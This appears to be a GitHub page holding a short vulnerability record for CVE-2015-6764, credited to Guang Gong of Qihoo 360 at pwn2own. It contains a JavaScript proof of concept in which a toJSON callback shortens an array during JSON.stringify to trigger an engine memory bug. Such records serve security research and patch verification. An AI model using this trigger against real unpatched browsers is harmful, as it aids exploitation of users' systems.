Skip to content

Latest commit

 

History

History
22 lines (17 loc) · 574 Bytes

CVE-2015-6764.md

File metadata and controls

22 lines (17 loc) · 574 Bytes
Raw

CVE-2015-6764

  • Date: Nov 2015
  • Credit: Guang Gong of Qihoo 360 via pwn2own

PoC

var array = [];
var funky = {
  toJSON: function() { array.length = 1; return "funky"; }
};
for (var i = 0; i < 10; i++) array[i] = i;
array[0] = funky;
JSON.stringify(array);

Reference